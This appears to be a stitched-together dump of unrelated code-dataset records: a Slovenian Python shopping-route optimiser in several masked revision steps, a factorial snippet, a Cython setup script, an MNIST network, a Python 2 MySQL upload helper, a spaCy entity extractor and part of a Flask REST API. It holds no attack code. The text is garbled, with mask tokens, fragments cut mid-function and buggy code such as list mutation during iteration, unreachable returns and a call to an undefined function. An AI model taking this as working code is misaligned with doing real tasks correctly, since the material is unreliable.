kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = []\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]:\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina]\n )\n dolzina = 0\n else:\n 
dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print('Nakupa ni mogoče opraviti.')\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini]\n return dolzina, sez_vozlisc\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\nbaza.commit()\n<mask token>\n",
"step-4": "import itertools\nimport numpy\nimport math\nimport psycopg2\nimport podatki\nbaza = podatki.baza\ndom = podatki.preberi_lokacijo()\nseznam_trgovin = ['spar', 'mercator', 'tus', 'hofer', 'lidl']\nid_in_opis = podatki.id_izdelka_v_opis()\nseznam_izdelkov = [el[0] for el in id_in_opis]\nmnozica_izdelkov = set(seznam_izdelkov)\ntrgovine_z_izdelki = podatki.trgovine_z_izdelki_f()\nseznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]\n<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = []\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]:\n 
dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina]\n )\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print('Nakupa ni mogoče opraviti.')\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini]\n return dolzina, sez_vozlisc\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\nbaza.commit()\nslovar_koordinat = 
podatki.slovar_koordinat\nkombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici),\n seznam_trgovin, trgovine_z_izdelki)\npot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki)\nrazpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici,\n podatki.trgovine_z_izdelki)\n",
"step-5": "import itertools\nimport numpy\nimport math\nimport psycopg2\nimport podatki\n\nbaza = podatki.baza\ndom = podatki.preberi_lokacijo()\nseznam_trgovin =[\"spar\", \"mercator\", \"tus\", \"hofer\", \"lidl\"]\nid_in_opis = podatki.id_izdelka_v_opis()\nseznam_izdelkov = [el[0] for el in id_in_opis] #['cokolada', 'sladoled', ...]\nmnozica_izdelkov = set(seznam_izdelkov)\ntrgovine_z_izdelki = podatki.trgovine_z_izdelki_f() #slovar: {'trgovina':['id1', 'id2'],...}\nseznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]\n'''\ndef zemljevid_trgovin(trgovine):\n sez = []\n for trgovina in trgovine:\n sez.append([trgovina, [])\n\ndef kombinacije_trgovin(seznam_izdelkov):\n sez_kombinacij = []\n for trgovina in trgovine:\n kombinacija = []\n izdelki = sez_izdelkov\n for izdelek in izdelki:\n if izdelek in trgovina:\n izdelki = izdelki.remove(izdelek)\n'''\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin, trgovine_z_izdelki):\n \n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for el in itertools.product(*[[0,1]]*len(seznam_trgovin)))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek) #množica vseh izdelkov, ki jih lahko dobiš v danih trgovinah\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin) \n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija) and kombinacija 
!= kombinacija2:\n kombinacije.remove(kombinacija) \n return kombinacije\n \n \n return None\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] - vozlisce1[0]) ** 2)\n\n#dom = [x,y] \ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = [] #skupine vozlišč iste trgovine\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]: #skupine[0] je seznam lokacij ene vrste trgovin\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print(\"Nakupa ni mogoče opraviti.\")\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini] #[[pot], dolzina]\n \n\n \n return (dolzina, sez_vozlisc)\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n 
i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek-1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n \nbaza.commit()\n\nslovar_koordinat = podatki.slovar_koordinat\n\nkombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki)\n#print(kombinacije_trgovin)'\npot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki)\nrazpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici, podatki.trgovine_z_izdelki)\n",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from compas.geometry import Frame
|
flexible
|
{
"blob_id": "d4e3751b2d4796c72be497007fe4c7d8ca67e18e",
"index": 6874,
"step-1": "<mask token>\n",
"step-2": "from compas.geometry import Frame\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in a:
b *= i
print(b)
<|reserved_special_token_1|>
a = range(1, 11)
b = 1
for i in a:
b *= i
print(b)
<|reserved_special_token_1|>
a=range(1,11) #1~10숫자를 에이에 저장
b=1
for i in a: #a에있는 원소를 b에 곱하고 비에 저장
b*=i
print(b)
|
flexible
|
{
"blob_id": "8cb7290792f9390dd350e0c79711e0dd72d6063b",
"index": 9508,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in a:\n b *= i\nprint(b)\n",
"step-3": "a = range(1, 11)\nb = 1\nfor i in a:\n b *= i\nprint(b)\n",
"step-4": "a=range(1,11) #1~10숫자를 에이에 저장\nb=1\nfor i in a: #a에있는 원소를 b에 곱하고 비에 저장\n b*=i\nprint(b)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='pytpm', packages=['pytpm'], package_dir={'pytpm': 'pytpm'},
package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']}, ext_modules=
cythonize(ext_modules))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
CUR_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.join(CUR_DIR, 'src')
TPM_DIR = os.path.join(SRC_DIR, 'tpm')
include_dirs = [SRC_DIR]
src_files = ['pytpm/_tpm.pyx']
library_dirs = [os.path.expanduser('~/lib/tpm')]
libraries = ['tpm']
ext_modules = [Extension('pytpm._tpm', src_files, include_dirs=include_dirs,
library_dirs=library_dirs, libraries=libraries)]
setup(name='pytpm', packages=['pytpm'], package_dir={'pytpm': 'pytpm'},
package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']}, ext_modules=
cythonize(ext_modules))
<|reserved_special_token_1|>
import os
from distutils.core import setup
from Cython.Distutils import Extension
from Cython.Build import cythonize
CUR_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.join(CUR_DIR, 'src')
TPM_DIR = os.path.join(SRC_DIR, 'tpm')
include_dirs = [SRC_DIR]
src_files = ['pytpm/_tpm.pyx']
library_dirs = [os.path.expanduser('~/lib/tpm')]
libraries = ['tpm']
ext_modules = [Extension('pytpm._tpm', src_files, include_dirs=include_dirs,
library_dirs=library_dirs, libraries=libraries)]
setup(name='pytpm', packages=['pytpm'], package_dir={'pytpm': 'pytpm'},
package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']}, ext_modules=
cythonize(ext_modules))
<|reserved_special_token_1|>
import os
from distutils.core import setup
from Cython.Distutils import Extension
from Cython.Build import cythonize
CUR_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.join(CUR_DIR, 'src')
TPM_DIR = os.path.join(SRC_DIR, 'tpm')
include_dirs = [SRC_DIR]
src_files = ["pytpm/_tpm.pyx"]
# TPM library and path to the library.
library_dirs = [os.path.expanduser("~/lib/tpm")]
libraries = ['tpm']
ext_modules = [
Extension(
"pytpm._tpm", src_files,
include_dirs=include_dirs,
library_dirs=library_dirs,
libraries=libraries
)
]
setup(
name='pytpm',
packages=['pytpm'],
package_dir={'pytpm': 'pytpm'},
package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']},
ext_modules=cythonize(ext_modules)
)
|
flexible
|
{
"blob_id": "3875d85bef37900f9066c108dc720b364cbafffa",
"index": 8476,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='pytpm', packages=['pytpm'], package_dir={'pytpm': 'pytpm'},\n package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']}, ext_modules=\n cythonize(ext_modules))\n",
"step-3": "<mask token>\nCUR_DIR = os.path.dirname(os.path.abspath(__file__))\nSRC_DIR = os.path.join(CUR_DIR, 'src')\nTPM_DIR = os.path.join(SRC_DIR, 'tpm')\ninclude_dirs = [SRC_DIR]\nsrc_files = ['pytpm/_tpm.pyx']\nlibrary_dirs = [os.path.expanduser('~/lib/tpm')]\nlibraries = ['tpm']\next_modules = [Extension('pytpm._tpm', src_files, include_dirs=include_dirs,\n library_dirs=library_dirs, libraries=libraries)]\nsetup(name='pytpm', packages=['pytpm'], package_dir={'pytpm': 'pytpm'},\n package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']}, ext_modules=\n cythonize(ext_modules))\n",
"step-4": "import os\nfrom distutils.core import setup\nfrom Cython.Distutils import Extension\nfrom Cython.Build import cythonize\nCUR_DIR = os.path.dirname(os.path.abspath(__file__))\nSRC_DIR = os.path.join(CUR_DIR, 'src')\nTPM_DIR = os.path.join(SRC_DIR, 'tpm')\ninclude_dirs = [SRC_DIR]\nsrc_files = ['pytpm/_tpm.pyx']\nlibrary_dirs = [os.path.expanduser('~/lib/tpm')]\nlibraries = ['tpm']\next_modules = [Extension('pytpm._tpm', src_files, include_dirs=include_dirs,\n library_dirs=library_dirs, libraries=libraries)]\nsetup(name='pytpm', packages=['pytpm'], package_dir={'pytpm': 'pytpm'},\n package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']}, ext_modules=\n cythonize(ext_modules))\n",
"step-5": "import os\nfrom distutils.core import setup\nfrom Cython.Distutils import Extension\nfrom Cython.Build import cythonize\n\nCUR_DIR = os.path.dirname(os.path.abspath(__file__))\nSRC_DIR = os.path.join(CUR_DIR, 'src')\nTPM_DIR = os.path.join(SRC_DIR, 'tpm')\ninclude_dirs = [SRC_DIR]\nsrc_files = [\"pytpm/_tpm.pyx\"]\n\n# TPM library and path to the library.\nlibrary_dirs = [os.path.expanduser(\"~/lib/tpm\")]\nlibraries = ['tpm']\n\next_modules = [\n Extension(\n \"pytpm._tpm\", src_files,\n include_dirs=include_dirs,\n library_dirs=library_dirs,\n libraries=libraries\n )\n]\n\nsetup(\n name='pytpm',\n packages=['pytpm'],\n package_dir={'pytpm': 'pytpm'},\n package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']},\n ext_modules=cythonize(ext_modules)\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Implements a Neural Network
"""
from vectorflux import VectorFlux
from mnist import read, show, normalize
from vectorflux.layers import Dense
from vectorflux.layers.Dropout import Dropout
train = list(read('train'))
test = list(read('test'))
print("Train size: {}".format(len(train)))
print("Test size: {}".format(len(test)))
# Normalization for values
test_x, test_y = normalize(test)
train_x, train_y = normalize(train)
vf = VectorFlux()
vf.add(Dense(800, activation='sigmoid', input_shape=784, optimizer='Momentum'))
vf.add(Dropout(0.5, input_shape=800))
vf.add(Dense(800, activation='sigmoid', input_shape=800, optimizer='ADAM'))
vf.add(Dense(10, activation='sigmoid', input_shape=800))
vf.train(x_train = train_x, y_train = train_y, x_test=test_x, y_test = test_y, epochs=100000, alpha=0.001, mini_batch_size=100)
|
normal
|
{
"blob_id": "94d296b5a13bfa59dba5812da31707f9db9080af",
"index": 1292,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Train size: {}'.format(len(train)))\nprint('Test size: {}'.format(len(test)))\n<mask token>\nvf.add(Dense(800, activation='sigmoid', input_shape=784, optimizer='Momentum'))\nvf.add(Dropout(0.5, input_shape=800))\nvf.add(Dense(800, activation='sigmoid', input_shape=800, optimizer='ADAM'))\nvf.add(Dense(10, activation='sigmoid', input_shape=800))\nvf.train(x_train=train_x, y_train=train_y, x_test=test_x, y_test=test_y,\n epochs=100000, alpha=0.001, mini_batch_size=100)\n",
"step-3": "<mask token>\ntrain = list(read('train'))\ntest = list(read('test'))\nprint('Train size: {}'.format(len(train)))\nprint('Test size: {}'.format(len(test)))\ntest_x, test_y = normalize(test)\ntrain_x, train_y = normalize(train)\nvf = VectorFlux()\nvf.add(Dense(800, activation='sigmoid', input_shape=784, optimizer='Momentum'))\nvf.add(Dropout(0.5, input_shape=800))\nvf.add(Dense(800, activation='sigmoid', input_shape=800, optimizer='ADAM'))\nvf.add(Dense(10, activation='sigmoid', input_shape=800))\nvf.train(x_train=train_x, y_train=train_y, x_test=test_x, y_test=test_y,\n epochs=100000, alpha=0.001, mini_batch_size=100)\n",
"step-4": "<mask token>\nfrom vectorflux import VectorFlux\nfrom mnist import read, show, normalize\nfrom vectorflux.layers import Dense\nfrom vectorflux.layers.Dropout import Dropout\ntrain = list(read('train'))\ntest = list(read('test'))\nprint('Train size: {}'.format(len(train)))\nprint('Test size: {}'.format(len(test)))\ntest_x, test_y = normalize(test)\ntrain_x, train_y = normalize(train)\nvf = VectorFlux()\nvf.add(Dense(800, activation='sigmoid', input_shape=784, optimizer='Momentum'))\nvf.add(Dropout(0.5, input_shape=800))\nvf.add(Dense(800, activation='sigmoid', input_shape=800, optimizer='ADAM'))\nvf.add(Dense(10, activation='sigmoid', input_shape=800))\nvf.train(x_train=train_x, y_train=train_y, x_test=test_x, y_test=test_y,\n epochs=100000, alpha=0.001, mini_batch_size=100)\n",
"step-5": "\"\"\"\nImplements a Neural Network\n\n\"\"\"\nfrom vectorflux import VectorFlux\nfrom mnist import read, show, normalize\n\nfrom vectorflux.layers import Dense\nfrom vectorflux.layers.Dropout import Dropout\n\ntrain = list(read('train'))\ntest = list(read('test'))\n\nprint(\"Train size: {}\".format(len(train)))\nprint(\"Test size: {}\".format(len(test)))\n\n# Normalization for values\ntest_x, test_y = normalize(test)\ntrain_x, train_y = normalize(train)\n\nvf = VectorFlux()\nvf.add(Dense(800, activation='sigmoid', input_shape=784, optimizer='Momentum'))\nvf.add(Dropout(0.5, input_shape=800))\nvf.add(Dense(800, activation='sigmoid', input_shape=800, optimizer='ADAM'))\nvf.add(Dense(10, activation='sigmoid', input_shape=800))\n\nvf.train(x_train = train_x, y_train = train_y, x_test=test_x, y_test = test_y, epochs=100000, alpha=0.001, mini_batch_size=100)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import enter
import loginout
import roleinfo
import zhanyi
import package
#import matrix
|
normal
|
{
"blob_id": "de665735f02c7569ab382fdc3e910d5d3ac05bb5",
"index": 9088,
"step-1": "<mask token>\n",
"step-2": "import enter\nimport loginout\nimport roleinfo\nimport zhanyi\nimport package\n",
"step-3": "import enter\nimport loginout\nimport roleinfo\nimport zhanyi\nimport package\n#import matrix",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# uploadops.py
# CS304-Final Project
# Created by: Megan Shum, Maxine Hood, Mina Hattori
#!/usr/local/bin/python2.7
# This file handles all the SQL calls for the upload page.
import sys
import MySQLdb
import dbconn2
def uploadPost(conn, username, description, location, time_stamp, pathname):
'''Inserts post in Posts table'''
curs = conn.cursor(MySQLdb.cursors.DictCursor) # results as Dictionaries
curs.execute('insert into posts(username, description, location, time_stamp, pic) values(%s, %s, %s, %s, %s)', [username, description, location, time_stamp, pathname])
# ================================================================
# This starts the ball rolling, *if* the script is run as a script,
# rather than just being imported.
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Usage: {name} nm".format(name=sys.argv[0])
else:
DSN = dbconn2.read_cnf()
DSN['db'] = 'mmm_db' # the database we want to connect to
dbconn2.connect(DSN)
print lookupByNM(sys.argv[1])
|
normal
|
{
"blob_id": "f0deb8ccaf50ea0abb9e1632eaa4354a4f21dece",
"index": 5794,
"step-1": "# uploadops.py\n# CS304-Final Project\n# Created by: Megan Shum, Maxine Hood, Mina Hattori\n#!/usr/local/bin/python2.7\n# This file handles all the SQL calls for the upload page.\n\nimport sys\nimport MySQLdb\nimport dbconn2\n\ndef uploadPost(conn, username, description, location, time_stamp, pathname):\n '''Inserts post in Posts table'''\n curs = conn.cursor(MySQLdb.cursors.DictCursor) # results as Dictionaries\n curs.execute('insert into posts(username, description, location, time_stamp, pic) values(%s, %s, %s, %s, %s)', [username, description, location, time_stamp, pathname])\n\n# ================================================================\n# This starts the ball rolling, *if* the script is run as a script,\n# rather than just being imported.\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print \"Usage: {name} nm\".format(name=sys.argv[0])\n else:\n DSN = dbconn2.read_cnf()\n DSN['db'] = 'mmm_db' # the database we want to connect to\n dbconn2.connect(DSN)\n print lookupByNM(sys.argv[1])\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import spacy
nlp = spacy.load("en_core_web_lg")
def find_entities(corpus):
doc = nlp(corpus)
entities = {}
for ent in doc.ents:
entity_type = ent.label_
entity_name = ent.text
values = entities.get(entity_type, set())
values.add(entity_name)
entities[entity_type] = values
return {key: list(val) for key, val in entities.items()}
|
normal
|
{
"blob_id": "3a0bf031b76d2df03cdb5b37861cb8942307709c",
"index": 7601,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef find_entities(corpus):\n doc = nlp(corpus)\n entities = {}\n for ent in doc.ents:\n entity_type = ent.label_\n entity_name = ent.text\n values = entities.get(entity_type, set())\n values.add(entity_name)\n entities[entity_type] = values\n return {key: list(val) for key, val in entities.items()}\n",
"step-3": "<mask token>\nnlp = spacy.load('en_core_web_lg')\n\n\ndef find_entities(corpus):\n doc = nlp(corpus)\n entities = {}\n for ent in doc.ents:\n entity_type = ent.label_\n entity_name = ent.text\n values = entities.get(entity_type, set())\n values.add(entity_name)\n entities[entity_type] = values\n return {key: list(val) for key, val in entities.items()}\n",
"step-4": "import spacy\nnlp = spacy.load('en_core_web_lg')\n\n\ndef find_entities(corpus):\n doc = nlp(corpus)\n entities = {}\n for ent in doc.ents:\n entity_type = ent.label_\n entity_name = ent.text\n values = entities.get(entity_type, set())\n values.add(entity_name)\n entities[entity_type] = values\n return {key: list(val) for key, val in entities.items()}\n",
"step-5": "import spacy\n\nnlp = spacy.load(\"en_core_web_lg\")\n\n\ndef find_entities(corpus):\n doc = nlp(corpus)\n entities = {}\n\n for ent in doc.ents:\n entity_type = ent.label_\n entity_name = ent.text\n\n values = entities.get(entity_type, set())\n values.add(entity_name)\n entities[entity_type] = values\n\n return {key: list(val) for key, val in entities.items()}\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
@api.route(f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
class CollectionsById(Resource):
@api.doc(description='[Q2] Deleting a collection with the data service.')
@api.response(200, 'Successfully removed collection.')
@api.response(404, 'Unable to find collection.')
@api.response(400, 'Unable to remove collection.')
def delete(self, collection_id):
if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):
return {'message': 'Unable to find collection.'}, 404
try:
db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})
except:
return {'message': 'Unable to remove collection.'}, 400
return {'message':
f'Collection = {collection_id} has been removed from the database!'
}, 200
@api.doc(description='[Q4] Retrieve a collection.')
@api.response(200, 'Successfully retreived collection.')
@api.response(404, 'Unable to retreive collection.')
def get(self, collection_id):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], 'indicator_value': collection[
'indicator_value'], 'creation_time': str(collection[
'creation_time']), 'entries': collection['entries']}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=
f'{COLLECTION}_countrydate')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
@api.param('country', 'Country identifier (eg. Arab World)')
class CollectionByCountryYear(Resource):
@api.doc(description=
'[Q5] Retrieve economic indicator value for given a country and year.')
@api.response(200,
'Successfully retrieved economic indicator for given a country and year.'
)
@api.response(400, 'Unable to retrieve indicator entry.')
@api.response(404, 'Unable to find collection.')
def get(self, collection_id, year, country):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['country'] == country and entry['date'] == year]
if len(filtered_entries) == 0:
return {'message':
f"Unable to find specific indicator entry for country='{country}' and year='{year}'."
}, 400
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], **filtered_entries[0]}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>', endpoint=
f'{COLLECTION}_by_top_bottom')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
class CollectionByTopBottom(Resource):
@api.doc(description=
'[Q6] Retrieve top/bottom economic indicator values for a given year.')
